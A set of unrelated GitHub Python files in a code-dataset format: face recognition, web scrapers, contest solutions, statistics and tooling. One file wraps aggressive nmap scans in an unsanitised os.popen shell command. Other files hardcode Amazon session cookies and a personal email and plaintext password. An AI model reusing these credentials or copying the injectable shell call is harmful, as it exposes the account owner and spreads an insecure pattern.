Quits when 'q' is pressed.\n\n Args:\n camera (VideoCapture): Webcam object.\n face_detector (CascadeClassifier): Face detector object.\n \"\"\"\n # Capture frame-by-frame\n while True:\n ret, frame = camera.read()\n\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n detections = face_detector.detectMultiScale(gray_frame, minSize=(100, 100),\n minNeighbors=5)\n\n draw_rectangle_around_faces(frame, detections)\n recognize_faces_on_camera(face_recognizer, detections, frame, gray_frame, width, height, font)\n\n cv2.imshow('Video', frame)\n\n # Press 'q' to quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\ndef draw_rectangle_around_faces(frame:Mat, faces:list[tuple]) -> None:\n \"\"\"Draws a rectangle around the faces.\n Args:\n frame (Mat): Frame to draw on.\n faces (list[tuple]): List of faces.\n \"\"\"\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\ndef recognize_faces_on_camera(face_recognizer, detections:list, image:Mat, gray_image:Mat, width:int, height:int, font:int) -> None:\n for (x, y, w, h) in detections:\n image_face = cv2.resize(gray_image[y:y + w, x:x + h], (width, height))\n cv2.rectangle(image, (x, y), (x + w, y + h), (0,0,255), 2)\n id, confidence = face_recognizer.predict(image_face) \n if id == 1 and confidence < 215:\n name = \"Rodrigo\"\n else:\n name = \"Someone else\"\n cv2.putText(image, name, (x,y +(w+30)), font, 2, (0,0,255))\n cv2.putText(image, str(confidence), (x,y + (h+50)), font, 1, (0,0,255))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RodrigoSdeCarvalho/FaceRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6880093374","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport pandas as pd\r\nimport dateparser\r\n\r\ndef crawl(url, phone, phone_color, phone_size):\r\n headers = {\r\n 'accept': 'text/html, application/xhtml+xml, image/jxr, */*',\r\n 'accept-encoding': 'gzip, deflate, br',\r\n 'accept-language': 'zh-CN',\r\n 'cookie': 'csm-hit=tb:s-1G0EMWYNQXNPAKKZJ68W|1563272028775&t:1563272029310&adb:adblk_no; session-token=lKKXtd8CUrAFdzfvoajdKtm5nU8VTAR0bD+X/R7nomtrjUIa62TkzUbQ4UWD8p0wDSf1nAuCRSioeFoMUjxYj+ZVAjymfQ7e+1wIXELT7Uk+TMKPlLprrKvleZR5fIZYjfR68pyjTqanYRLGEKEZEg9SSz+VW7c62/vH8q7feTvizAxSOdxJo0TRWqI+a5bC; session-id-time=2082754801l; session-id=260-8533334-2371525; i18n-prefs=EUR; x-wl-uid=1tkaKLVWq9MgwP34Ys3FGSTlQP5bMJMiMviKLm9whkk5vH9npeNn5b9zBPTTdHPyE7RpEpWDGEf8=; ubid-acbde=262-5774505-3025802; lc-acbde=en_GB',\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299'\r\n }\r\n\r\n session = requests.Session()\r\n response = session.get(url=url, headers=headers)\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n result = soup.find_all(\"div\", {\"data-hook\": \"review\"})\r\n data = []\r\n for res in result:\r\n username = res.find(\"span\", {\"class\": \"a-profile-name\"}).text\r\n star = res.find(\"span\", {\"class\": \"a-icon-alt\"}).text\r\n title = res.find(\"a\", {\"data-hook\": \"review-title\"}).text\r\n date = res.find(\"span\", {\"data-hook\": \"review-date\"}).text\r\n review = res.find(\"span\", {\"data-hook\": \"review-body\"}).text\r\n\r\n review_date = dateparser.parse(date).date()\r\n review_star = re.findall(r'\\d+', star, flags=0)[0]\r\n review_title = title.strip()\r\n review = 
review.strip()\r\n res = [phone, phone_size, phone_color, username, review_star, review_title, review_date, review]\r\n data.append(res)\r\n save = pd.DataFrame(data)\r\n save.to_csv(\"D:/data/data_it.csv\", mode='a', index=False, header=False, encoding=\"utf_8_sig\", )\r\n\r\nphone = \"iPhone XS\"\r\nname = \"Apple-iPhone-XS-64GB-siderale\"\r\nid = \"B07HLDMZJZ\"\r\nphone_color = \"Grigio siderale\"\r\nphone_size = \"64GB\"\r\ntotal = 13\r\n\r\nfor i in range(1, (total // 20) + 2):\r\n print(\"正在下载第{}页数据...\".format(i))\r\n # 亚马逊商品评论链接\r\n url = \"https://www.amazon.it/\"+name+\"/product-reviews/\"+id+\"/ref=cm_cr_getr_d_paging_btm_next_\"+str(i)+\"?ie=UTF8&reviewerType=all_reviews&pageNumber=\"+str(i)+\"&pageSize=20\"\r\n print(url)\r\n crawl(url, phone, phone_color, phone_size)\r\n\r\n","repo_name":"bioWzz/Lijian","sub_path":"getdata/getdata_no_style.py","file_name":"getdata_no_style.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37157869882","text":"data = [list(map(int,input().split())) for _ in range(3)]\r\n\r\nN = int(input())\r\nfor _ in range(N):\r\n bn = int(input())\r\n for i in range(3):\r\n for j in range(3):\r\n if bn == data[i][j]:\r\n data[i][j] = 0\r\nans = \"No\"\r\nfor i in range(3):\r\n if data[i][0] == data[i][1] == data[i][2] == 0:ans = \"Yes\"\r\n if data[0][i] == data[1][i] == data[2][i] == 0:ans = \"Yes\"\r\nif data[0][0] == data[1][1] == data[2][2]==0:ans =\"Yes\"\r\nif data[0][2] == data[1][1] == data[2][0] == 0 :ans=\"Yes\"\r\nprint(ans)","repo_name":"teruto725/atcoder","sub_path":"157/157b.py","file_name":"157b.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5529347601","text":"#import list\n\n#01. 사용자의 이름을 입력받아서 다음과 같이 출력하라: hello [이름]\nmaname = input(\"enter your name\") #입력된 e.y.n에 나의 이름을 입력한 변수를 저장한 뒤\nprint(\"hello\", maname) #hello 뒤에 이름으로 저장된 변수를 출력\n\n#02. 사용자의 이름을 입력받은 다음 사용자의 성을 입력받아서 다음과 같이 출력하라: hello [이름][성]\nname1 = input(\"enter your first name: \") #이름을 입력받음\nname2 = input(\"enter your last name: \") #성을 입력받음\nprint(\"hello\", name1, name2) #다음과 같이 출력을 할 경우, 출력할 값을 순서대로 쉼표로 연결해줌\n\n#03. \"what do you call a bear with no teeth\" 라는 농담을 치고나서 다음 줄에 \" a gummy bear!\"이라는 문장을 출��하기\nprint(\"What do you call a bear with no teeth?\\nA gummy bear!\")\n\n#04. 사용자로 부터 2개의 숫자를 입력받아서 더한 결과를 다음과 같이 출력하라: the total is [결과]\nintnum1, intnum2 = input(\"enter the any two numbers:\").split()\n#.split()은 공백을 기준으로 앞뒤의 문자열을 쪼개서 리스트로 만들어주는 함수.해당 함수는 각 변수를 문자로 인식.\n#자세하게는 .split(sep, maxsplit)에서 sep이라는 기준(ex. 공백, 쉼표)을 중심으로 maxsplit의 값만큼 문자열을 쪼갠다.\nno1=int(intnum1) #입력된 intnum1,2를 정수의 값으로 저장\nno2=int(intnum2)\ntotal1 = no1+no2 #그 합을 구함\nprint(\"the total is\", total1)\n\n#05.사용자로부터 3개의 숫자를 입력받는다. 첫번째와 두번째 숫자를 더한값에 세번째 값을 곱한결과를 다음과같이 출력하:the answer is[]\na,b,c=input(\"enter the three numbers(seperate to ,):\").split(\",\") #이번에는 쉼표를 기준으로 각 문자를 쪼갠 리스트를 생성\nnum_a=int(a)\nnum_b=int(b)\nnum_c=int(c)\n#ans=(num_a+num_b)*num_c\n#print(\"the answer is\",ans)\nprint(\"the answer is\",(num_a+num_b)*num_c)#따로 더한값을 정의하지않고 출력창에 계산식을 올려 출력\n\n#06. 사용자로 하여금 처음에 가진 피자조각수를 입력받고, 몇조각을 먹었는지 입력받아서 남은 조각수를 입력받아 사람에게 익숙한 형식으로 출력하라\nfirP=int(input(\"enter the number of slices of pizza at first:\"))\neatP=int(input(\"enter the number of slices of pizza you ate: \"))\nleftP=firP-eatP\nprint(\"⍙\\n\"*leftP)\n\n#07. 
사용자로 부터 이름과 나이를 입력받아 다음과 같이 출략하시오: [이름] next birthday, you will be [나이]\na, b =input(\"enter your name and age(seperate to ,):\").split(\",\") #원하는 값을 \nnm=str(a)\nbt=int(b)+1\nprint(\"%s! next birthday, you will be %d-year-old\" %(nm, bt)) #같은 형식의 값을 출력하기위해서 다음과 같이 괄호로 묶는다\n\n#08. 계산서의 총 가격과 몇명이 같이 식사했는지 입력받는다. 총 가격을 인원수로 나누고 사람씩 얼마를 내야하는지 출력하라\ncost=[] #cost를 리스트로 지정 \na = input(\"how much is the each prices of menu(seperate\" \")\").split()\nb=int(a)\npeop= input(\"how many does the number of people ate with you? (include you) \")\n#for i in range(b):\n #al=sum\nprint(\"the number of guest: \" %peop)\nprint(\"\\nthe price to pay for food: \" %sum(b))\n\n#09. 사용자로부터 입력받은 시간이 각 단위별로 값이 얼마인지 환산하기\nnw=input(\" 원하는 값의 숫자를 입력하시오: \")\nti=int(nw)\nmn=ti*60\nsc=mn*60\nprint( \"%d는 %d분과%d분과 같은 시간입니다\" %(ti,mn,sc))\n\n#10 몸무게를 입력받아서 파운드로 출력\ngram=input(\"what much do you weigh?: \")\npound=int(gram)\npound=pound*2.204\nprint(\"%d pound\"%pound)\n\n#11 사용자로부터 100이 넘는 숫자와 10미만의 자연수를 입력받아 나눗셈의 몫을 사용자 친화적으로 표현하라\nbigN=input(\"enter the number over 100: \")\nsmallN=input(\"enter thr small number under 10: \")\nresult=bigN//smallN\nprint(\"%dis %dtimes as big as %d \"%(bigN,result,smallN))","repo_name":"opuntia88/stud_code","sub_path":"py/book_py_01_test.py","file_name":"book_py_01_test.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"2155008775","text":"c = int(input()) # quilometros por litro\nd = int(input()) # distancia até o aeroporto\nl = int(input()) # número de litros de combustível no tanque\n\nquilometros = c*l # quantos quilômetros ele pode rodar\n\nif quilometros > d :\n print(0)\nelse:\n print(f\"{(d-quilometros)/c :.1f}\")","repo_name":"Master-Humberto/OBI","sub_path":"tanque.py","file_name":"tanque.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20903278642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom termcolor import colored\nimport os\n\n\ndef fun(dom,port):\n cmd = \"nmap -sC -sV -A -Pn -vv -p \" + str(port) + \" \" + str(dom)\n try:\n res = os.popen(cmd)\n output = res.read()\n print(output)\n f.write(output.__str__() + \"\\n\\n\")\n except Exception as e:\n print(e)\n f.write(str(e) + \"\\n\\n\")\n\n\n\n# MAIN FUNCTION\nif __name__ == '__main__':\n try:\n print(\"\\n DCE SERVICE CHECK USING NMAP\")\n path = input(\"\\nPlease provide the path to file: \")\n file = open(path.__str__().rstrip('\\n'), \"r\")\n print(\"\\n\")\n f = open( \"dce_test\" ,\"a+\")\n for target in file:\n url = target.__str__().rstrip('\\n').rstrip(' ')\n dom,port = url.split(\":\")\n print(colored(\"Scanning \" + str(dom) + \":\" + str(port) , \"blue\"))\n print()\n fun(dom,port)\n\n except KeyboardInterrupt:\n print(\"Canceling script...\")\n except Exception as e:\n print(e)\n","repo_name":"Mohit0/zero-scanner","sub_path":"additions/service_checker.py","file_name":"service_checker.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"44933769563","text":"import shutil\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog as fd\n\n\n\ndef profile_window(): #функция для личного профиля\n home = tk.Tk() # создание домашней страницы личного профиля\n home.title(\"Добро пожаловать!\")\n home.geometry(\"900x700\")\n home.resizable(width=FALSE, height=FALSE)\n 
home['bg'] = 'white'\n image = PhotoImage(\n file=r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/perepis.png\")\n user_avatar = Label(home, image=image) #место аватарки для пользователя\n user_avatar.place(x=20, y=20)\n button_input = Button(home, text='Выбрать фотку', bg='gold', font='Arial 9')#, command=lambda: #open_file())\n button_input.place(x=75, y=280)\n avatar_name = Label(home, text='Возраст', font='Arial 18', bg='gold', fg='black', padx=30)\n avatar_name.place(x=300, y=30)\n text_login = Label(home, text='Введенное имя', font='Arial 18', bg='gold', fg='black', padx=30)\n text_login.place(x=300, y=100)\n button_input1 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input1.place(x=300, y=200)\n button_input2 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input2.place(x=300, y=250)\n button_input2 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input2.place(x=300, y=300)\n button_input4 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input4.place(x=550, y=200)\n button_input4 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input4.place(x=550, y=250)\n button_input6 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input6.place(x=550, y=300)\n button_forgot = Button(home, text='Подобрать книги', bg='gold', font='Arial 18')\n button_forgot.place(x=420, y=350)\n # list_for_image = []#создание ссылки для фотографии\n\n # def open_file():\n # filetypes = ((\"Изображение\", \"*.png\"),)#задаем формат\n # my_file = fd.askopenfilename(title=\"Открыть файл\", filetypes=filetypes)#открываем файл для чтения\n # for m in my_file:#копируем выбранный файл\n # shutil.copyfile(my_file,\n # r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # break\n # image_path = r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\"\n # img = Image.open(image_path)\n # new_image = img.resize((250, 250))#задаем размеры\n # new_image.save(\n # r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # user_avatar.destroy()#удаляем прошлую фотку\n # imagea = PhotoImage(\n # file=r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # list_for_image.append(imagea)\n # avatara = Label(home, image=imagea)\n # avatara.place(x=20, y=20)\n\n home.mainloop()\n\nprofile_window()","repo_name":"VartanyanAdik/recomendation-book-system","sub_path":"stra.py","file_name":"stra.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71660611057","text":"from aocd import data, submit\r\nfrom itertools import product\r\nimport numpy as np\r\n\r\n\r\nlights = np.zeros((1000, 1000), dtype=np.int32)\r\nfor row in data.split(\"\\n\"):\r\n row = row[6:]\r\n if row[0] == \"f\": val = -1\r\n elif row[0] == \"n\": val = 1\r\n else: val = 2\r\n\r\n row = row.split(\" \")\r\n x0, y0 = map(int, row[1].split(\",\"))\r\n x1, y1 = map(int, row[3].split(\",\"))\r\n\r\n for x, y in product(range(x0, x1+1), range(y0, y1+1)):\r\n lights[y][x] += val\r\n if lights[y][x] == -1: lights[y][x] = 0\r\n\r\nresult = np.sum(lights)\r\nprint(\"result\", 
result)\r\nsubmit(result)\r\n\r\n","repo_name":"Luke-1335/aocd","sub_path":"2015/2015-06-b.py","file_name":"2015-06-b.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24529487414","text":"import os\nimport sys\nfrom lxml import html\n\ndef get_names_from_readme(readme_path):\n with open(readme_path, \"r\") as file:\n readme_content = file.read()\n\n tree = html.fromstring(readme_content)\n table = tree.xpath('//table')[0]\n rows = table.xpath('.//tr')\n names = []\n\n for row_index, row in enumerate(rows):\n cols = row.xpath('.//td')\n if len(cols) == 7: # Only process rows with exactly 7 columns\n for col_index, col in enumerate(cols):\n name_element = col.xpath('.//b')\n if name_element:\n name = name_element[0].text.strip()\n line_num = name_element[0].sourceline\n names.append((name, line_num))\n else:\n print(f\"Debug: Found {len(cols)} columns in row {row_index + 1}. Skipping row.\")\n\n return names\n\ndef main():\n base_names = get_names_from_readme(\"README.md\")\n head_names = get_names_from_readme(\"head/README.md\")\n\n print(f\"Debug: Base names: {base_names}\")\n print(f\"Debug: Head names: {head_names}\")\n\n # Check for duplicates\n head_name_dict = {name: line_num for name, line_num in head_names}\n if len(head_name_dict) != len(head_names):\n duplicates = [line_num for name, line_num in head_names if head_names.count(name) > 1]\n print(f\"Error: Duplicate names found on lines: {', '.join(map(str, duplicates))}\")\n sys.exit(1)\n\n # Check if name is added at the end of the table\n added_names = list(set(head_name_dict.keys()) - set(name for name, _ in base_names))\n if len(added_names) != 1:\n print(\"Error: Only one name should be added.\")\n sys.exit(1)\n\n added_name = added_names[0]\n if added_name != head_names[-1][0]:\n print(f\"Error: Names should be added at the end of the table. Line: {head_names[-1][1]}\")\n sys.exit(1)\n\n # Check if the table structure is maintained\n tree = html.fromstring(open(\"head/README.md\", \"r\").read())\n table = tree.xpath('//table')[0]\n rows = table.xpath('.//tr')\n\n for row in rows:\n cols = row.xpath('.//td')\n if len(cols) > 7:\n print(f\"Error: There should be no more than 7 columns in each row. 
Line: {cols[7].sourceline}\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alisolanki/Welcome-to-Open-Source","sub_path":".github/workflows/validate_pr.py","file_name":"validate_pr.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":1409,"dataset":"github-code","pt":"57"} +{"seq_id":"4963914849","text":"# Multidimensional Bernoulli distribution functions\n#\n# m.mieskolainen@imperial.ac.uk, 2020\n\nimport numpy as np\nimport numba\n\n\n@numba.njit\ndef bernoulli3_combinations(nT,nI,nF):\n \"\"\" Count 3-Bernoulli combinations.\n \n Args:\n nT,nI,nF: three arrays with {0,1} (Bernoulli) values\n \n Returns:\n Numpy array with 8 elements\n \"\"\"\n\n # Right endian binary expansion\n bstr = nT*4 + nI*2 + nF\n\n # Accumulate\n B = np.zeros(2**3, dtype=np.double)\n for i in range(len(nT)):\n B[bstr[i]] += 1\n\n return B\n\n\n@numba.njit\ndef bernoulli3_parameters(nT,nI,nF, EPS = 1E-15):\n \"\"\" Compute 3-point (multivariate) Bernoulli parameters: 2**3-1 = 7.\n \n Args:\n nT,nI,nF: are arrays containing Bernoulli random numbers\n\n Returns:\n Numpy array containing 7 parameters\n \"\"\"\n # Expectation values\n P_T = np.mean(nT)\n P_I = np.mean(nI)\n P_F = np.mean(nF)\n\n # Standard deviations\n std_T = np.std(nT)\n std_I = np.std(nI)\n std_F = np.std(nF)\n\n std_T = EPS if std_T < EPS else std_T\n std_I = EPS if std_I < EPS else std_I\n std_F = EPS if std_F < EPS else std_F \n \n # Correlation coefficients (2-point and 3-point)\n C_TI = np.mean((nT - P_T) * (nI - P_I)) / (std_T * std_I)\n C_TF = np.mean((nT - P_T) * (nF - P_F)) / (std_T * std_F)\n C_IF = np.mean((nI - P_I) * (nF - P_F)) / (std_I * std_F)\n C_TIF = np.mean((nT - P_T) * (nI - P_I) * (nF - P_F)) / (std_T * std_I * std_F)\n\n return np.array([P_T, P_I, P_F, C_TI, C_TF, C_IF, C_TIF])\n\n\ndef bernoulli2_is_valid(EX, EY, rho):\n \"\"\" Calculate phase-space admissibility of the 2D-Bernoulli distribution parameters.\n\n Args:\n EX: expectation value of X\n EY: expectation value of Y\n rho: correlation coefficient [-1,1] between (X,Y)\n \n Returns:\n True or False\n \"\"\"\n\n # First get the representation\n P = bernoulli2_rep(EX,EY,rho)\n\n # Then see, if it is within the probability phase-space\n if (np.all(P >= 0)) & (np.all(P <= 1)) & (np.sum(P) <= 1):\n return True\n else:\n return False\n\n\ndef bernoulli2_rhorange(EX, EY, n=10000):\n \"\"\" Get valid rho-parameter range given EX and EY.\n\n Args:\n EX: the expectation value of X\n EY: the expectation value of Y\n\n Returns:\n minv : minimum value\n maxv : maximum value\n \"\"\"\n # Find valid range\n rhoval = np.linspace(-1, 1, n)\n valid = np.zeros(len(rhoval))\n for i in range(len(rhoval)):\n valid[i] = bernoulli2_is_valid(EX=EX, EY=EY, rho=rhoval[i])\n\n # Find minimum\n minv = 0\n for i in range(len(valid)):\n if valid[i]:\n minv = rhoval[i]\n break\n\n # Find maximum\n maxv = 0\n for i in range(len(valid)):\n if valid[i]:\n maxv = rhoval[i]\n\n return minv, maxv\n\n@numba.njit\ndef bernoulli2_rep(EX, EY, rho):\n \"\"\" Change the representation of 2-point Bernoulli basis to the 2-hypercube basis.\n\n Args:\n EX: the expectation value of X\n EY: the expectation value of Y\n rho: the correlation coefficient\n\n Returns:\n P: numpy array with 4 probability elements\n \"\"\"\n\n # Change the representation to a multinomial (hypercube) basis\n p3 = rho*np.sqrt(EX*EY*(EX - 1)*(EY - 1)) + EX*EY\n p2 = EX - p3\n p1 = EY - p3\n p0 = 1 - (p1 + p2 + p3)\n\n P = np.array([p0, p1, p2, p3])\n\n # For 
speed, we do not test here if we are inside physically\n # possible phase-space [that check is done outside this function]\n\n return P\n\n@numba.njit\ndef bernoulli2_rand(n, EX, EY, rho=0):\n \"\"\" Generate 2-dimensional Bernoulli random numbers Z = (X,Y).\n with a non-zero correlation coefficient rho(X,Y) in [-1,1]\n\n Note! Test the input parameters first with bernoulli2_is_valid() function.\n \n Args:\n n : Number of experiments\n EX : Mean in [0, 1]\n EY : Mean in [0, 1]\n rho : Corr[X,Y] in [-1,1]\n\n Returns:\n v : Bernoulli random 2-vectors\n\n Examples:\n $ v = bernoulli2_rand(n=1000000, EX=0.2, EY=0.4, rho=0.2)\n $ print(f' = {np.mean(v[:,0])}, = {np.mean(v[:,1])}')\n $ print(f'COR = {np.corrcoef(v[:,0], v[:,1])}')\n \"\"\"\n\n # Change the representation\n P = bernoulli2_rep(EX, EY, rho)\n\n # Cast numbers via the multinomial distribution\n m = np.random.multinomial(n, P)\n\n # Generate Bernoulli 2-vectors\n B = np.array([[0,0], [0,1], [1,0], [1,1]])\n\n # Random order\n order = np.arange(n)\n np.random.shuffle(order) # in-place\n k = 0\n \n # Generate vectors in random order\n v = np.zeros((n,2))\n for c in range(4):\n for i in range(m[c]):\n v[order[k],:] = B[c,:]\n k += 1\n \n return v\n","repo_name":"mieskolainen/covidgen","sub_path":"covidgen/bernoulli.py","file_name":"bernoulli.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"30510713040","text":"# The average strike force of Frog A was 0.71 Newtons (N), and that of Frog B was 0.42 N for a difference of 0.29 N. It is possible the frogs strike with the same force and this observed difference was by chance. You will compute the probability of getting at least a 0.29 N difference in mean strike force under the hypothesis that the distributions of strike forces for the two frogs are identical. 
We use a permutation test with a test statistic of the difference of means to test this hypothesis.\n\n# For your convenience, the data has been stored in the arrays force_a and force_b.\n\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef permutation_sample(data1, data2):\n \"\"\"Generate a permutation sample from two data sets.\"\"\"\n\n # Concatenate the data sets: data\n data = np.concatenate((data1,data2))\n\n # Permute the concatenated array: permuted_data\n permuted_data = np.random.permutation(data)\n\n # Split the permuted array into two: perm_sample_1, perm_sample_2\n perm_sample_1 = permuted_data[:len(data1)]\n perm_sample_2 = permuted_data[len(data1):]\n\n return perm_sample_1, perm_sample_2\n\n\t\ndef draw_perm_reps(data_1, data_2, func, size=1):\n \"\"\"Generate multiple permutation replicates.\"\"\"\n\n # Initialize array of replicates: perm_replicates\n perm_replicates = np.empty(size)\n\n for i in range(size):\n # Generate permutation sample\n perm_sample_1, perm_sample_2 = permutation_sample(data_1, data_2)\n\n # Compute the test statistic\n perm_replicates[i] = func(perm_sample_1, perm_sample_2)\n\n return perm_replicates\n\t\ndf = pd.read_csv('data.csv', sep='\\t', header=0)\n\nsns.set()\n#print(df)\t\n\t\n# Make bee swarm plot\n_ = sns.swarmplot(x='ID', y='impact_force', data=df)\n\n# Label axes\n_ = plt.xlabel('frog')\n_ = plt.ylabel('impact force (N)')\n\n# Show the plot\nplt.show()\n\n\ndef diff_of_means(data_1, data_2):\n \"\"\"Difference in means of two arrays.\"\"\"\n\n # The difference of means of data_1, data_2: diff\n diff = np.mean(data_1) - np.mean(data_2)\n\n return diff\n\t\nforce_a= df['impact_force'][(df['ID']=='A')].tolist()\nforce_b= df['impact_force'][(df['ID']=='B')].tolist()\n\nprint(force_a)\nprint(force_b)\n\n# Compute difference of mean impact force from experiment: empirical_diff_means\nempirical_diff_means = diff_of_means(force_a, force_b)\n\n# Draw 10,000 permutation replicates: perm_replicates\nperm_replicates = draw_perm_reps(force_a, force_b,\n diff_of_means, size=10000)\n\n# Compute p-value: p\np = np.sum(perm_replicates >= empirical_diff_means) / len(perm_replicates)\n\n# Print the result\nprint('p-value =', p)\n\n\n# The p-value tells you that there is about a 0.6% chance that you would get the difference of means observed in the experiment if frogs were exactly the same. A p-value below 0.01 is typically said to be \"statistically significant,\", but: warning! warning! warning! You have computed a p-value; it is a number. I encourage you not to distill it to a yes-or-no phrase. p = 0.006 and p = 0.000000006 are both said to be \"statistically significant,\" but they are definitely not the same!\n\n# When you perform a hypothesis test in statistics, a p-value helps you determine the significance of your results. ... 
The p-value is a number between 0 and 1 and interpreted in the following way: A small p-value (typically ≤ 0.05) indicates strong evidence against the null hypothesis, so you reject the null hypothesis.\n","repo_name":"dmonisankar/pythonworks","sub_path":"DataScienceWithPython/sample_python_code/statistic/part2/sp014.py","file_name":"sp014.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"19555098992","text":"\nimport sys, os, time, json, requests, re, argparse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.chrome.options import Options\n\n\nos.chdir(r'C:\\Users\\takis\\Google Drive\\_projects_\\medium-to-notion')\nsaved_links_df = pd.read_pickle(\"data/title_link.pkl\")\n\nCHROME_DRIVER = r'C:\\Users\\takis\\Google Drive\\chromedriver.exe'\nPAGE = \"https://medium.com\"\nMEDIUM_BOOKMARKS_PAGE = \"https://medium.com/me/list/queue\"\nEMAIL = 'pan.fessas@gmail.com'\nPASSWORD = 'T28!1990akis'\n\n\ndef parse_user_arg():\n parser = argparse.ArgumentParser(description=\"Parse links given a CSV file\")\n parser.add_argument(\"-f\",\"--file\", help=\"filepath for csv that contains the links to parse\")\n args = parser.parse_args()\n return args.file\n\n\ndef browse_medium_bookmarks():\n\n global driver\n driver = webdriver.Chrome(CHROME_DRIVER)\n driver.get(PAGE)\n\n def navigate_to_xpath(xpath,keys=None):\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, xpath))\n )\n temp_field = driver.find_element_by_xpath(xpath)\n if keys:\n temp_field.send_keys(keys)\n else :\n temp_field.click()\n\n # get started button\n navigate_to_xpath('//*[@id=\"top-nav-get-started-cta\"]/div/span/a/button')\n # sign in button\n navigate_to_xpath('//*[@id=\"susi-modal-sign-up-link\"]/div/h4/button/b')\n # google sign in button\n navigate_to_xpath('//*[@id=\"susi-modal-google-button\"]/a/div')\n # type in email\n navigate_to_xpath('//*[@id=\"identifierId\"]',EMAIL)\n # proceed\n navigate_to_xpath('//*[@id=\"identifierNext\"]/div/button/div[2]')\n # type in password\n navigate_to_xpath('//*[@id=\"password\"]/div[1]/div/div[1]/input', PASSWORD)\n # proceed\n navigate_to_xpath('//*[@id=\"passwordNext\"]/div/button/div[2]')\n time.sleep(3)\n # go to bookmarks page\n driver.get(MEDIUM_BOOKMARKS_PAGE)\n # close pop up window\n navigate_to_xpath('/html/body/div[2]/div/div/div/div[1]/div/button')\n\n\ndef scroll_down():\n\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n match = False\n while (match == False):\n lastCount = lenOfPage\n time.sleep(3)\n lenOfPage = driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\"\n )\n if lastCount == lenOfPage:\n match = True\n\n\ndef scroll_down_to_existing():\n\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n match = False\n counter = 1\n\n while (match == False):\n\n print(f'Iteration {counter}')\n if counter % 5 == 0 :\n print(f'Cross Check with existing links {counter}')\n gather_links()\n diff_checker(saved_links_df, temp_df)\n if intersection 
